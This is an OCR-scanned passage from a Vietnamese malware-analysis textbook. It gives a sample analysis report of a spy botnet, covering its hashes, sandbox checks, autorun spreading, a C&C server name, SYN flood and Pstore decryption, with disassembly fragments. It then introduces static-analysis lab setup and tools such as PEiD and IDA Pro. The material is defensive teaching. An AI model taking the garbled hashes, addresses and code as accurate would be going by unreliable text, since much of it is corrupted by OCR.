một số thông tin, nhưng như vậy chưa đủ, ta vẫn cần dịch ngược mã độc 
hại dé xem chi tiết rõ hơn liệu mã độc hại còn làm gì nữa và làm vào 
thời điểm nào. 

Do mã độc hại khi thu được là ở dạng thực thi không có mã 
nguồn đi kèm theo để phân tích nên thường phải dịch ngược mã độc hại 
đó về mã assembly để phân tích. Thường ở bước này ta sẽ làm những 
VIỆC sau: 

- Xem mã độc hai được viết bang ngôn ngữ gi? 

- Có sử dụng các packer để nén lại hay các protector (chương trình 

bảo vệ)nào không? 

- Khi biết mã độc hại được pack bằng trình nào thì có thé dùng trình 

đó unpack ra, tương tự cũng unprotector file mã độc hại. 

- Dùng các công phụ phù hợp với công cụ viết mã độc hại để 

decompile, disassemble, debugging... 

- Boc va phân tích mã code assembly dé tìm thêm hoạt động của mã 


độc hại. 
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- Trace code , debug ma độc hai khi việc dịch ngược tỏ ra khó khăn 
hoặc thiếu hiệu quả. Hoặc khi cần làm thật rõ một đoạn mã người ta 
phải debug mã độc hại. Có nghĩa là sẽ lần từng lệnh nhỏ của mã độc 
hại để xem chính xác là mã độc hại đã làm những gì. Mã độc hại 
thường có các kỹ thuật chống dịch ngược thì cũng sẽ có các kỹ 
thuậnt chống debug (anti debug) và người phân tích phải vượt qua 
nó (anti anti-debug). 

3.2.4 Viết báo cáo tong kết hành vi hoạt động mã độc 
Sau khi phân tích xong mẫu mã độc, người phân tích cần tông hợp thành 
một báo cáo hành vi hoạt động của mã độc. Dưới đây là một báo cáo 
tổng hợp lại kết quả sau khi phân tích. 
I. CONF4.exe 
SHA256:1c09b262b940d22c7f0b695 6aee0949a640db666 1 6bf70e4cdf6b 
le7eae06828 
SHAI: fd24495048ce85e39174b0f9f6fc5597137b84d5 
MI: ceea769e2b3dfc45ce8f0075541a5939 
File size: 112.7 KB( 115376 bytes) 
File name: conf4.exe 
File type: Win32EXE 
Code bang Borland Delphi( 2.0-7.0) và VisualC++ 6.0 
II. Thóng tin chung 
- File là mót Spy Bot Net dà bi 22/44 trinh diét virus phát hién theo 
virus total xác dinh. 
III. Các hoat dóng cu thé. 
Kiểm tra các chương trình thực hiện việc phân tích như wireshark,... và 


hàm kiêm tra sandbox, vmware... 


, text; 004049C 3 lea eax, [ebp+pcbBuffer] 

. text; 004049C6 push edi 

.text:004049c 7 push eax ` pcbBuffer 
.text:004049c8 lea eax, [ebpsStr] 

. text: 004049CE mov [ebp+var_14], offset aSandbox 
. text: 00404905 push eax ; lpBuffer 

. text: 00404906 mov [ebpevar 10], offset aHoney 
.text:004049pp mov [ebpsvar C], offset aVwware 
.text:004049£4 mov [ebpevar 8], offset aCurrentuser 
.text:004049£8 mov [ebp«pcbBuffer], 80h 

. text: 004049f 2 call ds :GetUserNameA 


Hinh 3-20: Kiém tra mói truóng phán tích 
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Thực hiện việc dang ki, tao thread tự động copy file, dùng các API 
CopyFileA copy file virus sang, tạo mới các file desktop.ini dang kí các 


khóa autorun: 


ica Ca^, Lcuptracimanc J 


push eax ; lpstringl 

call esi ; lstrcatA 

lea eax, [ebp«PathName] 

push offset aAutorun inf ; "\\autorun. inf" 
push eax ; IpStringl 

call esi ` lstrcatA 

lea eax, [ebp«PathName] 

push 80h ; dwFileAttributes 
push eax ; l|pFileName 

call ebx ; SetFileAttributesA 

xor esi, esi 

lea eax, [ebp+PathName] 

push esi ; hTemplateFile 

push 7 ; dwFlagsAndAttributes 
push 2 ` dwCreationDisposition 
push esi ; lpSecurityAttributes 
push esi ; dwShareMode 

push 40000000h ; dwDesiredAccess 

push eax ; lpFileName 

call ds:CreateFileA 

mov edi, eax 


Hinh 3-21: Tao autorun 

Tao các thread vói hàm chính cüa Bot, dé duy trì nhận lệnh bot từ xa từ 
C&C server: New.gov.me. 

Các chức năng của Bot tìm thay: 

- Tự hủy 

- Xóa Registry key 

- Tự tạo file.bat remove các file 

- Download các file tự cập nhật 

- Lay lan file crack.exe vào tat cả các file. rar trên máy. 


S€LCUFF€HLUTFECLCOFYA\V.. J; 


} 


else 
if ( GetFullPathNameA(FindFileData.cFileName, Oxl04u, &string, &FilePart) ) 
CharLowerA(&string); 
v2 = ]str]enA(&Str1ng); 
if € Imemcmp(&v3[v2], "rar", 3u) ) 
Sleep(0x1388u); 


sub 406032(&/6, 7, 1); EN E 
sub. 405C39(&string, NumberOfByteswritten, “"+eUÿÉ+PâP”, 128);// +éUyE+PaP = crack.exe 


Hinh 3-22: Lay lan file crack vào các file .rar 
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- Spam email ( gửi file zip ), Spam lay thông tin các loại tài khoản 
yahoo, MSN, Spype 
- Dua file lay nhiém vao mang P2P torrent 


uz ZOU 

402280 

402280 

402280 loc_402280: ; CODE XREF: CaseChucNang+/DBTj 
402280 push dword ptr [esi] ; IpString2 

402282 push offset aP2p 

102287 call edi 1strcmpiA 

402289 test eax, eax 


Hinh 3-23: Lay nhiém vao mang P2P torrent 

- Tan cong Dos cac muc tiéu chi dinh ( syn flood) 

- Tìm giả mã hệ thống bảo vệ Pstore của Windows 

3.2.5 Xử lý mẫu mã độc 
Tìm signature của mã độc hại và phương pháp diệt mã độc hại 
Trong bước này thực hiện: 
e Tìm đặc điểm nhận diện mã độc hai trong hệ thống sau khi phân tích 
(vi dụ tại offset nào đó chứa chuỗi string nào, hoặc giá tri MD5 của 
Hle...). 
* Đề ra các phương án khắc phục hệ thống bị nhiễm mã độc hai. 
e Tim phuong án diệt nó, néu nam được hành vi của nó có thé tự viết các 


script xóa mã độc hai đó trong hệ thống. 


3.3 Câu hỏi và bài tập 
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Chuong 4 

CAC KY THUAT PHAN TICH TINH 

Trong các chương trước giáo trình đã trình bày quy trình phân tích ma 
độc, trong quy trình phân tích có mô tả các phương pháp sử dụng để 
phân tích mã. Chương 4 nảy sẽ giúp sinh viên hiểu rõ hơn phương pháp 
phân tích tĩnh. Trước khi phân tích thì sinh viên cần cách xây dựng môi 
trường hỗ trợ công việc phân tích. 

4.1 Xây dựng môi trường phân tích tĩnh 

Xây dựng môi trường phân tích mã độc là công việc quan trọng. Như 
đã biết mã độc luôn tiềm án các hành vi nghi ngờ và rat dé lây lan. Việc 
xây dựng môi trường phân tích mã phù hợp và an toàn là việc cần thiết. 
Dé tạo ra được môi trường an toản trong khi phân tích mã độc hai, trong 
phương pháp phân tích tĩnh để phân tích mã độc hại người ta dùng 2 
cách: 

- Xây dựng môi trường ảo dé phân tích mã độc. 
- Xây dựng môi trường thật dé phân tích mã độc. 
4.1.1 Xây dựng môi trường ảo. 

Việc xây dựng môi trường ảo đảm bảo cho các loại mã độc hại không 
phá hoại được hệ thống máy tính thật. Các phần mềm dé xây dựng môi 
trường ảo như Vmware workstation, virtualbox.... Ở đây sẽ lựa chọn xây 
dựng môi trường phân tích với VM workstation. 

Phương án xây dựng như sau: 

- Một máy tính thật cài Windows 7 

- Trên Win 7 cai đặt một máy ao Vmware, trong máy ao cài đặt 
Windows XP( môi trường để chạy malware và thực hiện phân tích). 

- Cài đặt mạng phù hợp với việc phân tích. 

- Cài các tool cần thiết phục vụ việc phân tích 

Thực hiện việc cài đặt Vmware sao cho memory ( 515 mb) và Hard 
Disk ( 10Gb), sau khi thực hiện cai đặt xong, tùy thuộc vao từng loại ma 


độc hại đê cải câu hình mạng. 
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“` EU 


| Hardware Options | 

: Device status 

Device Summary 
| JE Memory 512 MB IE Connected 

& Processors 1 [V] Connect at power on 
Hard Disk (SCSI) 4GB 
© CD/DVD (IDE) Auto detect Network connection 
H Floppy Auto detect © Bridged: Connected directly to the physical network 
Fa Network Adapter Host-only Replicate physical network connection state 
> Ze a send t NAT: Used to share the host's IP address 

'ouni ui c 
Eglpisplay Nuls detect © Host-only: A private network shared with the host 

© Custom: Specific virtual network 
VMnet1 (Host-only) 


Hình 4-1: Chon cấu hình mạng 


Sau khi cai đặt xong, Vmware sẽ tạo nên 2 card mang Vmware | và 


Vmware 8 trên máy thật và máy thật có thé sử dụng 2 card mạng này dé 
kết nói với các máy ảo. khi lựa chon cau hình mạng cho máy ảo ta có thé 
chọn một trong các chế độ sau: 

Bridged networking: Card mạng của máy ảo sẽ được gắn trực tiếp với 
card mạng của máy that (sử dụng switch ảo VMnet0). Lúc nay, may ảo 
sẽ đóng vai trò như một máy trong mạng thật, có thể nhận DHCP từ 
mạng ngoài, hoặc đặt IP tĩnh cùng dải với mạng ngoài để giao tiếp với 
các máy ngoài mạng hoặc lên Internet. 

NAT: Máy ảo được cau hinh NAT sẽ sử dung IP của máy thật dé giao 
tiếp với mạng ngoài. Các máy ảo được cấp địa chỉ IP nhờ một DHCP ảo 
của VMware. Lúc này, các máy ảo sẽ kết nối với máy thật qua switch ảo 
VMnet8, và máy that sẽ đóng vai trò NAT server cho các máy ảo. 

Host-only Networking: Khi cấu hình máy ảo sử dụng host-only 
networking, máy ảo sẽ được kết nối với máy thật trong một mạng riêng 
thông qua Switch ảo VMnetl. Dia chỉ của máy ảo và máy thật trong 
mạng host-only có thé được cấp bởi DHCP ảo gắn liền với Switch ảo 
Vmnetl hoặc có thé đặt địa chi IP tinh cùng dải dé kết nối với nhau. Ta 


sẽ chủ yếu dùng loại này dé cau hình khi phân tích 
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Host-Only Networking 


Virtual 
Ethemet 


adapter 


Virtual machine geesde... ` server 


Virtual Ethemet switch 
[Mne*1: 


Host virtual 


adapter 
Beles 
[TT] 


Hinh 4-2: Host- only Networking 
Sau khi cáu hinh mang xong, ta nên tao take snapshot lai một bảng sach. 
Snapshot giüp chüng ta restore lai trang thái làm viéc mói nhát. Dé sau 
mói làn phán tích ta lai có 1 mót máy mói mà khóng cán phái di cài lai. 
Ta chi can vào snapshot, chay lai snapshot sach ban dau khi mà chua cho 


bát ki vào phán tích. 


lg occ ctun meon M NN m 


Windows XP bandau 
Professional 


Snapshot details 


©) El Show AutoProtect snapshots 


2 snapshot(s) 


Hinh 4-3: Tao snapshot 
Sau khi cài xong Vmware, ta cài hệ diéu hành Xp lén do, cài dat các 
cóng cu lén dé giám sát su thay dói và tác dóng cüa các chuong trinh nén 
hé thóng dang thuc thi. 
Một số công cụ cần thiết cho môi trường phân tích tĩnh nhu sau: 


127 


4.1.1 Công cu Peid 

La công cu phát hiện xem file được viết bang ngôn ngữ gi. Ngoài ra 
đây là một công cụ cần thiết xem file có bị nén (pack) hay không? Nếu 
bị nén (pack) thì người phân tích cần phải tìm cách giải nén (unpack 


file) phù hợp. 


File: | C:\paitap\CrackMe \KeyLog 1.exe ICH 


Entrypoint: [0004C748 EP Section: [CODE - [>| 
File Offset: [00048848 First Bytes: [55,88,6C,83 |>] 
Linker Info: | 2.25 Subsystem: | Win32 GUI >] 


[Borland Delphi 6.0 - 7.0 
Multi Scan | | Task viewer | | Options | | About || Ext | 
[ Stay on top | >» | E 
Hình 4-4: Phan mềm Peid 
Như trong hình có thể thấy chương trình Peid đã nhận ra mã nguồn 


chương trinh Keylogl.exe viết bằng Borland Delphi 6.0-7.0 
4.1.2 Dependency Walker 

http://www.dependencywalker.com/ 

Là một công cu dé tìm các file Dll và hàm import của mã độc hai. 
Chương trình được sử dụng trên cả x86, x64 được xây dựng theo một sơ 
đồ phân cấp của tất cả các file DII sé được nạp vào bộ nhớ khi phần mềm 


độc hại được chạy. 
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Dependency Walker - [Dumped] a B EW 
BG File Edit View Options Profile Window Help -ax 
oH ,® lì oO œ AY 33) si: SEI) W 
= [] DUMPED.EXE pr Loggt [hot NNNM Function 


> 


= E KERNEL32,DLL = 106 (0x006A) | _dlonexit 
=- EA SHELL32.DLL 182 (0x00B6) | _adjust_fdiv 
c DI MSVCRT.DLL 237 (0x00ED) | _except_handler3 
a | KERNEL32 280 (0x0118) | ftol 
^| NTDLL.DLL 315 (0x013B) | _initterm Mi 


2 


| 
dee 


^| USER32.DLL 1(0x0001)| 1(0x0001)|??0_ non rtti objectGXGQAEGABVOQQ: — 
z ^| KERNELSZDUL — 2(0x0002)| 2(0x0002)|??0 non_rttị_object@@QAE@PBD@Z v 
«i m | > K Im | E 
^ | Module | File Time Stamp | Link Time Stamp  |FieSze ëm. ` Link Checksum | Real Checksum ^ 
1®) MSJAVA.DLL Error opening file, The system cannot find the File specified (2). — 
E |ADVAPI3Z.DLL | 08/04/2004 3:56p | 08/04/2004 2:56p| 616,960 | A 0x000A0DE4  |0x000A0DE4 
E | coMpL632.DLL 08/04/2004 3:56p | 08/04/2004 2:56p| 276,992 | A 0x0004B1DF — |0x0004BIDF — y, 
mm -—==== wes . - t= D .—= os o - meee A mm mm wm mm — 
< il | › 


Hình 4-5: Dependency Walker 
Là công cụ sử dụng thực hiện việc unpack, sau khi dump debugged 
process ta sẽ có 1 file (.exe),người phân tích cần phải sử dụng công cu 


nay dé fix lại bảng IAT bang tay hoặc tự động fix. 


Import REConstructor v1.6 FINAL (C) 2001-2003 MackT/uCF 


Attach to an Active Process 
fe: \documents and seHingsvadmirsstratorvdesktop®nolepad_ asp exe (0000069C) ~ | Pick DLL 
Imported Functions Found 


e advapi32 dll FThunk:000062E 0 NbFunc-5 (decimal 5] valid YES SR Ei 

* 9432 di FT hunk: 000062F8 NEF unc:17 (decimat 23) val YES 

+ 0:25 (decimal: 37) valid: NO Show Suspect 

+. ? FThunk-O00063F0 NDF unc:6 (decimal 6) vaid NO 

e ? FThunk:0000640C NbFunc:3C (decimal:60) valid NO 

e ?FThưnk:00006500 NbFunc:7 (decimat?) valid NO 
Clear Imports | 

Log 


IAT read successfully. 


Current imports: Clear Log 
2 pecie 2) valid module(s] — +2 [decimal «2]) 
84, (decimal 133) imported functions). (added: 
(BE (decimat 110] unresolved pon added «5E (decimal «110] v 
IAT Infos needed New Import Infos (IID«ASCII«L OADER) Options | 
OEP [000010CC IAT AutoSearch | RvA [00000000 Size [0000024E [m] 


RVA [o00062DC Size [00000244 V Add new section 


Hinh 4-6 ImportREC 
4.1.3 Công cu PE 
Day là công cu có day đủ chức năng dé làm việc với file PE/PE+( 64 
bit). Bao gồm Task Viewer( dump full, process dump...), PE Sniffer(tim 
trình biên dịch, packer..) , PE Editor( xem va chỉnh sửa các bang import 
129 


export, sua CRC...), PE Rebuilder( Thay đổi địa chỉ co sở PE của một 
tập tin..) 


EM PE Tools v1.5 Xmas Edition - by NEOx/[uinC], http:Z/www.uin... [E JE 
File Tools Plugins Options Help 

(9) jf ak CE ore ms = e 

Path PID Image Base Image Size 

Bh? c:idocume--1*4admini-1*ocals-1*tempirar$... OO00004F8 00400000 DOOCEOOO 


@ c:\program Files\winrar\winrar.exe oo0007B4 00400000 00120000 
c:\documents and settingsyadministratoride... 00000268 00400000 00168000 


Ei c:\documents and settingsyadministratoride... OO00069c 00400000 0001E000 


Path Image Base Image Size 
Slc: documents and settingsYadministratorideskktopipetoolsi... 00400000 0004E000 
®) ci \windows\system32jntdil. dil 7C900000 000B0000 
E ci windows\|system32\ikernel32. dll 7CcC800000 000F4000 
E c: \windows\winsxs\x86_microsoft.windows.common-contr... 773D0000 00102000 
(25) c:\windows\system32\msyert.dll 77C10000 00058000 
a c: \windows\system32\advapi32.dll 77Dboo000 00096000 


Processes loaded: 29 SoftICE is not loaded 


Hình 4-7 PE Tools 

4.1.4 Công cu HexEditor 

Hex Editor là bộ hoàn chỉnh các công cu phát triển hệ thập lục phân 
cho Microsoft windows. Nó tích hợp tiên tiến chỉnh sửa và giải thích dữ 
liệu nhị phân, với cách nhìn trực quan, xử lí linh hoạt một tiến trình. Với 
hex editor người phân tích có thể chỉnh sửa, cắt, sao chép, dán, chèn, xóa 
dir liệu nhi phân. 
———————MMÁ— ——— 


a a- HARAGIA EA E [Sl p* «X QS, 9 4|%- ” 
[A Bumped x 


00000092 
00003470 oo 83 3d 40 56 Jå.. 1....7ƒ=ÊV8 


00003480 30 oo 50 40 00 - ¥SVWUu'j0;.P@.¥ Total Size No selection bytes 
00003490 50 00 ff 35 64 “£....ÿ5@P@.ÿ5dP Fragments No selection 
000034a0 co Se 02 00 00 Q.Peé5igy3Àé^...; 


000034b0 d4 40 00 6a 02 808.30Py.Ód8.3.; 


Details 


000034c0 63 00 8b 53 GV8.SPy.1c8.«oSS 
000034d0 63 00 81 ff ff 7@V@.P¥.1c@. ÿÿÿ 
000034e0 42 47 01 50 ff ... 6...jB G.PÿS 
|| 000034£0 o0 44 56 40 00 DVE. ÿ. sch. GR. 
00003500 04 40 00 53 8b Ã.„Ê...S¡.P@.S<5 
00003510 50 53 53 68 @d@.ht...PyOSSh - 
00003520 ff al 44 56 40 ---¥5.P@. ÿÕ ¡ DNR. 
00003530 57 al 40 56 40 Py. c8.‹cèWU¡@V@. 
00003540 56 00 50 ff 15 Py.àc8.;GVO.Py.x 
00003550 8b 80 38 00 75 c8.‹Ä yc.«1e8.u. 
00003560 2f 85 ff 74 48 E. GIuô#./. ÿtHU 
RI " | > 


Ready Offset: 0x00000092 (146) Size: 0x0001e000 (122,880): 120.00 KB Hex bytes, 16, Default ANSI OVR 


Hinh 4-8 HexEditor 
4.1.5 IDA pro 
4.1.5.1 Giói thiệu chung: 
IDA Pro là công cụ được sử dung rộng rãi nhất dé phân tích phần mềm 


độc hai. IDA pro giúp dịch ngược các mã độc hai vé các đoạn mã 


130 


assembly. Nó là một công cụ dé đọc, trực quan và tiện dụng với nhiều 
chức năng nhưng cũng chính vì vậy mà việc sử dụng IDA Pro cũng khá 
phức tạp. đi kèm với IDA ta có thé cai đặt thêm nhiều plugin như Bindiff, 
Hex-Rays Decompiler. Đây là hai plugin hỗ trợ đắc lực cho IDA giúp so 
sánh các biến thể của phần mềm độc hại, xác định các chức năng mới 


trong biến thể đó và cho biết nếu có bất kỳ chức năng tương tự bị mất đi. 


lã IDA - C:\IDA\REVERSING\ Dutt ewe -loj x| 
Fie Edit Jump Search View Debugger Options Windows Help 

CT GRE D ap) Bog a xo s =| Ble dE =x 
[8] IDAViewEsP [=] IDAViewElP | El) Threads | @ General registers | Edit Search 


Debugger: Library loaded: C: AWINNTNS ys Cem 2 NNTULL OLL 
Debugger: Library loaded: 
Debugger: Library loadec 


AU: idle [Down (Disk: 103GB [00031219 


Ei IDA view-EIP 


* .text:804531207 call ds:InitCommonControls 2| 
= 


&lj 00000350 
line 1 of 1 


EEE Was 


BE 


* 8612FF38 uar_ dd 65h 


a 
; Stack[ 88880 4 


* .text:0043120D call sub 430081 * 8012FF3^ dd 12FFC8h 
* .text:00531212 call sub 437667 * 8012FF38 retaddr dd 43CC53h ; sta 
* .text:08531217 test eax, eax * 8612FF3C hInstance dd offset unk ^88 


* 8612FF48 hHenu dd 8 
* 8612FF44 ulIDEuent dd offset unk 132D 
* 8612FF48 n€mdShow dd 80h 


* „text:8813121B push 
* .text:88431221 push 


ds:1pSt eax= 88888881 
offset aSFatalError 


* .text:66431246 push 


1 


88888898 L, 


L[NTDLL -DLL:77FD6176 


* „text:B88131226 call sub 86B 86 6612FF48 ; [END OF STACK FRAME Wink 

* .text:8843122B pop ecx * 8612FFAC dd 12D9Chh ; Stack PAGE - 

* .text:6643122C mou esi, eax * 8612FF58 dd 88h 

* .text:8843122E pop ecx * 8612FF5^ dd 7FFDF688h hd 
* .text:8843122F push 36h » 
* .text:88431231 push esi 

* .text:88431232 push offset Text x! 
* .text:88431237 push 88888881 

* .text:66431239 call ds :MessageBoxa 

* text :0043123F push esi : 7FFDF880|l|debug013:7FFDF 668 

* .text:88431248 call sub A^86E7E 88888865 

* .text:60431245 pop ecx 77FD8178 


* .text:60431248 pop eax 

* .text:80431249 jmp loc_43264E 
SLAG TEL a oe LEE 
„text :6643124E 

-text:8843125E loc_43124E: 

* .text:6643124E mou eax, dword_45A1C4 


J ——'——Á t 
Hinh 4-9: IDA pro 
Có những loai mã độc hai không debug hay phan tích được bình thường 


6612D9C4 LJstack_PAGE_GUARD[ 0869835 
8812FF3»% kracht 66666356] : 8812FF3*% 
8812FF3»% kracht 88888358] -6612FF34 
66431219 b [vinnain(x QX,X,X)435 


88888286 


So) + 6G oo) ¬e= 


mà phải sử dụng các chương trình Decomplier dành riên cho chúng. Vì 
vậy ta sẽ cài đặt thêm một só cóng cu phuc vu cho viéc phan tích nhu sau. 
4.1.5.2 Các chức nang co bán 

Sau khi người phân tích đưa một file cần phân tích vào, chương trình sé 
hiện lên một hộp thoại bên trong đó có chứa định dạng file và chọn 
PE( pe.ldw) để làm việc. Trong Option là các tùy chọn để cho IDA tự 
phân tích file vào cho ra hiên thị ở cửa số chính. Sau đó nhẫn OK dé vào 
giao diện chính đề làm việc. 

Giao diện là việc của IDA gồm có 7 cửa số: 
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Desktop\Cruchead CrackMe SCRACKMES EK 


DD. C\Usersilinki = 
File Edit Jump Search View Debugger Options Windows Help 


sule [Anela e +|⁄j= 
23 KEE SEN We QT RF Re 


Bm (200 NX Érxy§NWNKH-/ : ¡3# WHR RAR 
E39|58®8./Á/ 
| am Il z | ET 


i Functions window [t [83] EE IDA Vien IS geen 12 A Stuctues |E8]En Erums IS E Impats = E] Expats | 3 

s H11U11HIEIIL ». UETđUIL 
Function name S 
o gai -686p 
ower nng 
ŸWlDllgtue — 7 .nodel flat 
Pis 400275 
H 
J sub 401311 ¡ Segment type: Pure code 
K sub 401330 E ; Segnent pernissions: Read/Execute 4 
F) sub 401346 CODE segment para public ‘CODE’ use32 
sub 401362 assume cs:C0DE 
YPiLoadlconA ;org 401000h 
Y MessageBoxA - assume es:nothing, ss:nothing, ds:CODE, Fs:nothing, gs:nothing 
"iiLoadCursorh Graph overview (8) 
` iBegjstetFlassA 
„ PostQuitMessage i | E public start 
k TranslateMessage i em start proc near 

‘ShowWindow 5 push 0 ` 1pHoduleNane 
` iUpdaleWindow call ` GetoduleHandlef 
Yi CreateWindowExA. nou ds:hInstance, eax 
9 DefWindowProcA nov dszdword EEN, ? ; 
Yo ialaaRovParamd d push — 8 ; hTenplateFile . 
‹ M ' push Ip ` duFlagsAndAttributes 
HI 00000600. am start 
— 

&g Output window. 
Rays. x86. Dem ler. V1.5. READ. NFO-RDW 1daél plugins EVER, piw) error: The specitied module could not be TOU 
C:\Users\11nh\Desktop\Hex-Rays IDA Pro len 6.1 Full + Hex-Rays 1.5 + SDK + FLAIR + IDS Util + dons ex Rays. IDA. Pro. Advanced, v6. 1. Windows, incl, Hex-Rays. x86. Decompi ler. v1. 5 READ. NFO-F 
Nidaetiplugins python.plw: can't load f 
Can not set debug privilege: Not ju II leges Or groups referenced are assigned to the caller. 
Using FLIRT signature: SEH for vc7/ 6 
Propagating type information.. 
Function argument information has been propagated 
The initial autoanalysis has been finished. 


n R 


Dan Di 168 
Hinh 4-10 Giao dién lam viéc IDA pro 

(1) Toobar chứa các thanh công cụ sử dụng trong hoạt động cua IDA, 
để thực hiện các chức năng ta nhấp vào các biểu tượng trên đó. 

(2) Navigation band nơi có thé vào và ra khỏi địa chỉ bằng cách nhấp 
chuột di chuyển bằng cách điều chỉnh theo hướng mũi tên màu vàng. 
Mỗi màu sắc của cửa só thé hiện vung dir liệu mà ta làm việc. 

(3) Tabs có chứa cửa số nhỏ những thông tin chỉ tiết về file đối tượng, 
việc phân tích phụ thuộc vào những tabs này. Gồm có IDA View-A, 
Hex View-A, Struct, Enums, Imports,Exports, String. 

(4)Disassembly hiển thị dữ liệu để phân tích theo 2 loại text hoặc 
graph 

(5)Graph overview mot đồ thị thu nhỏ mô tả cấu trúc cơ ban của dữ liệu. 
Man hinh chữ nhật cham nhỏ cho thấy màn hình hiên thị vị trí hiện tại 


đang làm việc. 
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(6) Output window nhận được các thông tin, tin nhan tir IDA sau khi 
load file xong. 

(7) Function window day la cua số hiện thi tất cả các ham API các địa 
chỉ tìm thấy trong quá trình phân tích. 

IDA Text view màn hình hiên thị kiểu text trình bày toàn bộ về công 
việc disassembler cũng như cung cấp địa chỉ để xem các dữ liệu thuộc 
vùng nào. 

EJE IDA Views ($31 


(34 En Enums 


[93 Se Imports 17 $9 Exports E 3] IDA View 


;[CODE XREF: DialogFunc*38|j 
;[DialogFunc*^i|j 


[ebp+arg 8], 3F2h 
jnz short loc l612EE 


9 ; 
push ` [ebp+hD1q] : 
call ` EndDialog 

mou eax, 1 

short loc h812CD 


Midi A loc h812EE: CODE XREF: DialogFunc«291j 


00000800 — 00401200: DialogFunc+1E 
Hinh 4-11: Ctra só IDA view 

(1) Các mũi tên thể hiện nơi nhảy đến trong khối đoạn mã và nhận 

ra các vòng lặp nhỏ. 

(2) Hiện ra các địa chỉ Virtual Address 

(3) Các vị trí được so sánh để đánh dấu nhảy hoặc các biến tham 

chiếu trong stack 

(4) Code của chương trình disassembled 

(5) Code tham chiếu hiên thị các điểm đến khi truy cập, nhấp đúp 

vào sẽ đưa ta đến đoạn mã, hoặc hàm được gọi hoặc nhảy lên phía trên. 

Hoặc để nhảy đến vị trí tham chiếu khác ta nhấp chuột phải->jump to 


cross reference. 
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Fucntion Window hién thi các hàm được nhận định bởi IDA 


WF ncbont ER 

Funcion name Segment Start length R F L S B T s 
Pi sub, 4020€ 8 CODE (409 — 00000160 R g 

71 sub, 402278 CODE 00400278  000001A2 R 8 

YA sub, 40041C CODE 0040041C — 000001DA R 


Hinh 4-12: Ctra só Function 

Bang cách nhấp chuột hoặc enter là ta có thé di chuyên đc đến hàm đó 
trong cửa số chính disassembly. Ta nhìn thấy bên trong function window 
gòm có function name, segment, start, length, R( return hàm trả vé khi 
goi),F ( far),L (libarary), S (static), B( BP tham chiếu đến biến cục bộ),T 
( type thông tin). 

String Window tai cửa số này hién thi ra thông tin tat cả các chuỗi xuất 
hiện trong file thực thi. Cửa số này hiện thị chỉ tiết về địa chỉ, độ dài, 
kiểu, tên chuỗi đó là gì. Ta có thể truy cập đến các chuỗi này bằng cách 
nhắn dap chuột nó sẽ di chuyển đến cửa số Disassembly dé chúng ta 
thực hiện. 

Import window cửa số hién thi chi tiết địa chỉ, tên hàm được import va 
thư viện chứa ham import đó. Đây là một cửa số rất quan trọng bởi ta có 
thé thay được chương trình sử dụng các DLL khác nhau và chức năng 
của các hàm được gọi như đọc, viết hoặc registry .... Tại đây ta có thé 
thập được các thông tin về các ham import mà mã độc hai hay dùng dé 


chèn vào với mục dich xâu như lay cap thông tin, theo doi ... 


>) | 
Em Imports 


[E ||] IDA Views || £3 | [S] Hex View 1 ES | fk. Structures || E En Enums | ESA 
Address Ordinal Mame Library 

Ee 00450118 DeleteCriticalS ection kernel32 

E 0045011C LeaveCriticalS ection kernel32 

Ee 00450120 EnterCriticalS ection kernel32 

Ee 004501 24 InitializeCriticalS ection kernel32 

EES 00450128 VirtualFree kemel32 

Ee 004501 2C Virtual&lloc kernel32 

EE, 00450130 LocalFree kernel32 


Hình 4-13: Cửa số Import 
Export window là cửa số liệt kê các entrypoint của tập tin. Trong cửa số 
này gồm có liệt kê theo tên, địa chi ảo và thứ tự( néu có). Đối với các file 
thực thi export window cần phải chứa ít nhất một entry point đây là địa 


chỉ điểm đầu vào dau tiên trong lúc thực thi. 


134 


Cross-references cửa sô hiện thi tat cả các tham chiêu, la tat cả các 
diém code nơi mà hàm được gọi. Dé mở được cửa sô này ta chỉ nhân vào 
header của hàm, kích chuột phải chon jump to reference xref hoặc chon 


trên thanh công cụ view-> Open subview-> cross reference. 


een 
Lul xrefs to sp.440410 A — “i kel x 
T. Address 
p  sub_44056C+38 
o CODE:00428E8D 


Direction 


cal sub 440410 
dd offset sub 440410 


| Cancel 


Search | 


Hình 4-14: Cửa số tham chiếu Cross- references 

Name Window là cửa số cung cấp danh sách các tên được sử dụng, tên 
có thé được sắp xếp theo bảng chữ cái hoặc dé virtual address. Hiển thi 
tên có các chữ cái in hoa khác nhau A( string data), D( data), C( Name 
code), I( import name), L (library fuction), F( regular function). Bằng 
việc nhấp dup chuột vào tên bất kì ta muốn tìm, chương trình sẽ chuyên 
đến vi trí đó trong cửa số chính hién thi dé làm việc. Chọn view-> option 
subview-> name. 

Function-Calls cửa số thé hiện được 2 chức năng caller và called 
function. Xác định được các hàm được gọi xung quanh đó là gì. View-> 
option subview-> function call. 


li Function calls: sub_4434E8 


| Address 


CODE:00424F94, 
CODE:0044310B 


Caller 


sub. 42AF84 
sub_4490F0 


Instruction 


cal sub 4434E8 
call sub 4434E8 


Address 

CODE:004434FC 
CODE:00443518 
CODE:00443523 


Called function 


cal sub 4033E4 
cal sub 44018C 
cal sub 419EF0 


Hình 4-15: Cửa số Function calls 


Con rat nhiêu những cửa sô khác với các chức năng khác nữa, những 


cửa sô giới thiệu bên trên là những cửa sô quan trọng nhât trong việc làm 
việc với công cụ [DA pro. 


Menu Jump 
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yn oe 


File Edit E Search View pem (plom N Windows Help 


SE [" Jump to operand Enter P ` aM 


3 3! 


H Jumpin anewwindow ` After IS i 
ulli * 

+ Jump to previous position Ec a S LK l s J | 3e 

Å En | umptonetpostion — Cte |I § M Ko 3 ; HT uh RAKAR 

B d Empty navigation stack 


Jump to pseudocode à; : 
Jump to address... Lo mini mm | 
hp by name. vh 2 | Set [IET n Em: 616 lng |) Fuchs wr | 


Jump to function.. eax, [eax Th) 
Kat à edx, [ebpevar 6] 
mr cms si, VI 
Jump to segment register... sub MO 
Jump to problem... [ebpevar 10], 0 
short loc Mu 
edx, edx 
eax, [ebpeuar 10) 
Jump to xef to operand... sub WEE 
Jump to entry point... H 

file offset. eax, [ebpeuar 8] 
Jump to file offset. NHÀ [eactin] 
Mark position... DCH, DCH 


eax, [ebpeuar 18] 
Jump to marked position.. sub. 441054 
Clear mark... 


Jump to cross reference... 
Jump to cross reference from... 


: i : ` CODE XREF: sub 4ANBER+BNT J 
CODE: OOWAANAS ; Sub AMigES«9rt 
- CODE: 0Wuhâhậ5 


Hinh4-16: Menu Jump 

Jump to address(G) nhiều lúc ta sẽ biết được địa chỉ chính xác mà ta 
muốn đến dé thuận tiện cho việc nay IDA cũng tạo ra 1 cửa số dé nhập 
vào địa chỉ muốn jump. 
